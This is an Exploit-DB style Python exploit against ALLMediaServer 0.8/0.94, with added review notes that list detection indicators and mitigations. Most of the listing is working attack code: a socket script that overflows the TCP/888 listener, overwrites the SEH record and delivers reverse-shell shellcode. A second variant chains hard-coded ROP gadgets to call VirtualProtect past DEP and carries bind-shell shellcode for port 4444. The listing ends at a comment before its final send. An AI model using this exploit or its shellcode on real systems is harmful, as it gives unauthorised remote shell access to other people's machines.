# Exploit Title: seh exploit, BOF
# Date: 04/07/2012
# Exploit Author: motaz reda
# my E-mail:motazkhodair@gmail.com
# Software Link: http://allmediaserver.org/
# Version: ALLMediaServer 0.8
# Tested On: Windows 7 ultimate
################################################
#
# Review notes (defensive context):
#   Proof-of-concept for a stack-based buffer overflow in the ALLMediaServer
#   network listener on TCP/888: one oversized message (1072 filler bytes
#   followed by an SEH record overwrite and a payload) is enough to
#   corrupt the SEH chain. Versions named on this page as affected:
#   0.8 (author) and 0.94 (Exploit-DB note); no fixed version is stated here.
#   The Exploit-DB addendum below is a second variant for DEP-enabled hosts
#   that borrows return addresses from the non-rebased bundled DLLs
#   (avcodec-53.dll, avformat-53.dll, MediaServer.exe), i.e. lack of ASLR
#   in the shipped binaries is what makes it feasible.
#   Detection indicators grounded in this listing: an unsolicited TCP/888
#   client message of roughly 1.3 KB (first variant) or exactly 1765 bytes
#   (second variant) consisting mostly of repeated 0x41 ('A') bytes and,
#   in the second variant, trailing 0xCC padding; a resulting
#   MediaServer.exe crash or unexpected child shell; and, per the author's
#   comment, a listener appearing on TCP/4444.
#   Mitigation: do not expose TCP/888 beyond trusted networks, and prefer
#   builds with DEP/ASLR-compatible dependencies; the version-specific fix
#   status is not documented on this page.
#
#!/usr/bin/python
import sys, socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Target host comes from argv[1]; there is no argument or error handling.
s.connect((sys.argv[1], 888))
buffer = "A" * 1072
buffer += "\xeb\x06\x90\x90" #NSEHjmp short 6
buffer += "\xca\x24\xec\x65" # SEHPOP POP RETN
# msfpayload windows/shell_reverse_tcp
# you can replace the shellcode with any shellcode u want
buffer += ("\xd9\xc8\xd9\x74\x24\xf4\xb8\xa6\xaa\xb6\xad\x5b\x2b\xc9\xb1"
"\x4f\x83\xeb\xfc\x31\x43\x15\x03\x43\x15\x44\x5f\x4a\x45\x01"
"\xa0\xb3\x96\x71\x28\x56\xa7\xa3\x4e\x12\x9a\x73\x04\x76\x17"
"\xf8\x48\x63\xac\x8c\x44\x84\x05\x3a\xb3\xab\x96\x8b\x7b\x67"
"\x54\x8a\x07\x7a\x89\x6c\x39\xb5\xdc\x6d\x7e\xa8\x2f\x3f\xd7"
"\xa6\x82\xaf\x5c\xfa\x1e\xce\xb2\x70\x1e\xa8\xb7\x47\xeb\x02"
"\xb9\x97\x44\x19\xf1\x0f\xee\x45\x22\x31\x23\x96\x1e\x78\x48"
"\x6c\xd4\x7b\x98\xbd\x15\x4a\xe4\x11\x28\x62\xe9\x68\x6c\x45"
"\x12\x1f\x86\xb5\xaf\x27\x5d\xc7\x6b\xa2\x40\x6f\xff\x14\xa1"
"\x91\x2c\xc2\x22\x9d\x99\x81\x6d\x82\x1c\x46\x06\xbe\x95\x69"
"\xc9\x36\xed\x4d\xcd\x13\xb5\xec\x54\xfe\x18\x11\x86\xa6\xc5"
"\xb7\xcc\x45\x11\xc1\x8e\x01\xd6\xff\x30\xd2\x70\x88\x43\xe0"
"\xdf\x22\xcc\x48\x97\xec\x0b\xae\x82\x48\x83\x51\x2d\xa8\x8d"
"\x95\x79\xf8\xa5\x3c\x02\x93\x35\xc0\xd7\x33\x66\x6e\x88\xf3"
"\xd6\xce\x78\x9b\x3c\xc1\xa7\xbb\x3e\x0b\xde\xfc\xa9\x74\x49"
"\x03\x3e\x1d\x88\x03\x2f\x81\x05\xe5\x25\x29\x40\xbe\xd1\xd0"
"\xc9\x34\x43\x1c\xc4\xdc\xe0\x8f\x83\x1c\x6e\xac\x1b\x4b\x27"
"\x02\x52\x19\xd5\x3d\xcc\x3f\x24\xdb\x37\xfb\xf3\x18\xb9\x02"
"\x71\x24\x9d\x14\x4f\xa5\x99\x40\x1f\xf0\x77\x3e\xd9\xaa\x39"
"\xe8\xb3\x01\x90\x7c\x45\x6a\x23\xfa\x4a\xa7\xd5\xe2\xfb\x1e"
"\xa0\x1d\x33\xf7\x24\x66\x29\x67\xca\xbd\xe9\x97\x81\x9f\x58"
"\x30\x4c\x4a\xd9\x5d\x6f\xa1\x1e\x58\xec\x43\xdf\x9f\xec\x26"
"\xda\xe4\xaa\xdb\x96\x75\x5f\xdb\x05\x75\x4a")
# Single send; the socket is closed without reading any response.
s.send(buffer)
s.close()

### Exploit-DB note:
### This affects AllMediaServer 0.94 as well.

# Exploit-DB Note:
# Here's a ROP chain that will work on Windows 7 Pro Eng DEP AlwaysOn
# DEP/ASLR bypass with bind shell on port 4444
# NOTE(review): every gadget address below is a hard-coded, non-ASLR
# location in the bundled DLLs / MediaServer.exe, as the "~ module"
# annotations state; the chain is specific to that exact build.
buffer = "\x41" * 984
buffer+= "\xe6\x30\x46\x00" # Second ADD esp for stack adjustment
# add esp,90 | pop esi | pop ebx | retn ~ MediaServer.exe
buffer+= "\x41" * 88 # Step over SEH
stackAdjust = "\x9e\x6c\x42\x00" # add esp,800 | pop ebx | retn ~ MediaServer.exe
# Returns to Second ADD ESP
stackAdjust+= "\x42\x42\x42\x42" * 15 # Padding
# VirtualProtect into ESI
rop = "\x26\xfa\xf6\x65" # pop eax | retn ~ avcodec-53.dll
rop+= "\xe0\xe4\x1e\x67" # &kernel32.VirtualProtect ~
rop+= "\x54\xcd\xc6\x6a" # mov eax,dword ptr ds:[eax] | retn ~
rop+= "\x04\xef\x2e\x66" # xchg eax,esi | retn ~ avcodec-53.dll
# Puts kernel32.VirtualProtect
# lpAddress param into EBP
rop+= "\xb3\x14\xb8\x68"# pop ebp | retn ~
rop+= "\x07\x5d\x0c\x66" # ROP jmp esp | ??? ~ avcodec-53.dll
# dwSize into EBX
rop+= "\x26\xfa\xf6\x65"# pop eax | retn~ avcodec-53.dll
rop+= "\xff\xfd\xff\xff" # Will negate to 0x201
rop+= "\xbe\x13\x6e\x66"# neg eax | retn
rop+= "\x2b\xe2\xf4\x65" # xchg eax,ebx | retn ~ avcodec-53.dll
# flNewProtect 0x40 into EDX
rop+= "\x26\xfa\xf6\x65"# pop eax | retn ~ avcodec-53.dll
rop+= "\xc0\xff\xff\xff" # Will negate to 0x40
rop+= "\xbe\x13\x6e\x66"# neg eax | retn~ avcodec-53.dll
rop+= "\x46\x08\x53\x66" # xchg eax,edx | retn ~ avcodec-53.dll
# lpflOldProtect into ECX
rop+= "\x26\xfa\xf6\x65"# pop eax | retn ~ avcodec-53.dll
rop+= "\x69\xef\x5f\x00" # writeable address ~ avformat-53.dll
rop+= "\xeb\x9b\x74\x66" # xchg eax,ecx | retn ~ avcodec-53.dll
# RETN into EDI
rop+= "\x84\xe6\x75\x66" # pop edi | retn
rop+= "\x6d\x9b\xb2\x6a" # retn ROP
# Nops in EAX
rop+= "\x26\xfa\xf6\x65"# pop eax | retn ~ avcodec-53.dll
rop+= "\x90\x90\x90\x90"
# PushAD
rop+= "\x3a\x18\x75\x66" # pushad | retn ~ avcodec-53.dll
rop+= "\x90\x90\x90\x90"
shellcode =( "\xba\x4b\xdb\xfb\xca\xdb\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x56\x31\x55\x13\x03\x55\x13\x83\xed\xb7\x39\x0e\x36"
"\xaf\x37\xf1\xc7\x2f\x28\x7b\x22\x1e\x7a\x1f\x26\x32\x4a"
"\x6b\x6a\xbe\x21\x39\x9f\x35\x47\x96\x90\xfe\xe2\xc0\x9f"
"\xff\xc2\xcc\x4c\xc3\x45\xb1\x8e\x17\xa6\x88\x40\x6a\xa7"
"\xcd\xbd\x84\xf5\x86\xca\x36\xea\xa3\x8f\x8a\x0b\x64\x84"
"\xb2\x73\x01\x5b\x46\xce\x08\x8c\xf6\x45\x42\x34\x7d\x01"
"\x73\x45\x52\x51\x4f\x0c\xdf\xa2\x3b\x8f\x09\xfb\xc4\xa1"
"\x75\x50\xfb\x0d\x78\xa8\x3b\xa9\x62\xdf\x37\xc9\x1f\xd8"
"\x83\xb3\xfb\x6d\x16\x13\x88\xd6\xf2\xa5\x5d\x80\x71\xa9"
"\x2a\xc6\xde\xae\xad\x0b\x55\xca\x26\xaa\xba\x5a\x7c\x89"
"\x1e\x06\x27\xb0\x07\xe2\x86\xcd\x58\x4a\x77\x68\x12\x79"
"\x6c\x0a\x79\x16\x41\x21\x82\xe6\xcd\x32\xf1\xd4\x52\xe9"
"\x9d\x54\x1b\x37\x59\x9a\x36\x8f\xf5\x65\xb8\xf0\xdc\xa1"
"\xec\xa0\x76\x03\x8c\x2a\x87\xac\x59\xfc\xd7\x02\x31\xbd"
"\x87\xe2\xe1\x55\xc2\xec\xde\x46\xed\x26\x69\x41\x23\x12"
"\x3a\x26\x46\xa4\xad\xea\xcf\x42\xa7\x02\x86\xdd\x5f\xe1"
"\xfd\xd5\xf8\x1a\xd4\x49\x51\x8d\x60\x84\x65\xb2\x70\x82"
"\xc6\x1f\xd8\x45\x9c\x73\xdd\x74\xa3\x59\x75\xfe\x9c\x0a"
"\x0f\x6e\x6f\xaa\x10\xbb\x07\x4f\x82\x20\xd7\x06\xbf\xfe"
"\x80\x4f\x71\xf7\x44\x62\x28\xa1\x7a\x7f\xac\x8a\x3e\xa4"
"\x0d\x14\xbf\x29\x29\x32\xaf\xf7\xb2\x7e\x9b\xa7\xe4\x28"
"\x75\x0e\x5f\x9b\x2f\xd8\x0c\x75\xa7\x9d\x7e\x46\xb1\xa1"
"\xaa\x30\x5d\x13\x03\x05\x62\x9c\xc3\x81\x1b\xc0\x73\x6d"
"\xf6\x40\x83\x24\x5a\xe0\x0c\xe1\x0f\xb0\x50\x12\xfa\xf7"
"\x6c\x91\x0e\x88\x8a\x89\x7b\x8d\xd7\x0d\x90\xff\x48\xf8"
"\x96\xac\x69\x29")
payload = buffer + stackAdjust + rop + shellcode
# Fixed total message length of 1765 bytes; the remainder is 0xCC padding
# (a useful length/byte-pattern signature for network detection).
rest = 1765 - len(payload)
exploit = payload + "\xCC" * rest
# Send exploit to target's port 888